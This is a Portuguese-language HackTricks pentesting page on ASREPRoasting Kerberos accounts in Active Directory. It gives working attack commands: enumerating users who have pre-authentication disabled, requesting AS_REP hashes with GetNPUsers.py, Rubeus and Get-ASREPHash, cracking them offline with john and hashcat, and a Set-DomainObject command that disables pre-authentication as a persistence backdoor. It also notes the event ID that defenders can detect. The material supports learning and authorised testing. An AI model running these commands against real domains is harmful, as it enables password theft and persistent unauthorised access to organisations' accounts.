hacktricks/windows-hardening/active-directory-methodology/asreproast.md
2023-06-06 18:56:34 +00:00

4.3 KiB

ASREPRoast

O ataque ASREPRoast procura por usuários sem o atributo de pré-autenticação Kerberos necessário (DONT_REQ_PREAUTH).

Isso significa que qualquer pessoa pode enviar uma solicitação AS_REQ para o DC em nome de qualquer um desses usuários e receber uma mensagem AS_REP. Esse último tipo de mensagem contém um pedaço de dados criptografados com a chave de usuário original, derivada de sua senha. Em seguida, usando essa mensagem, a senha do usuário pode ser quebrada offline.

Além disso, não é necessário ter uma conta de domínio para realizar esse ataque, apenas conexão com o DC. No entanto, com uma conta de domínio, uma consulta LDAP pode ser usada para recuperar usuários sem pré-autenticação Kerberos no domínio. Caso contrário, os nomes de usuário devem ser adivinhados.

Enumerando usuários vulneráveis (necessita de credenciais de domínio)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Solicitação de mensagem AS_REP

{% code title="Usando Linux" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

{% code title="Usando o Windows" %}

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} O AS-REP Roasting com o Rubeus irá gerar um 4768 com um tipo de criptografia de 0x17 e um tipo de pré-autenticação de 0. {% endhint %}

Quebrando

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

Persistência

Forçar a não exigência de preauth para um usuário onde você tem permissões de GenericAll (ou permissões para escrever propriedades):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Referências

Mais informações sobre AS-RRP Roasting em ired.team

Siga HackenProof para aprender mais sobre bugs web3

🐞 Leia tutoriais de bugs web3

🔔 Receba notificações sobre novas recompensas por bugs

💬 Participe de discussões na comunidade

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥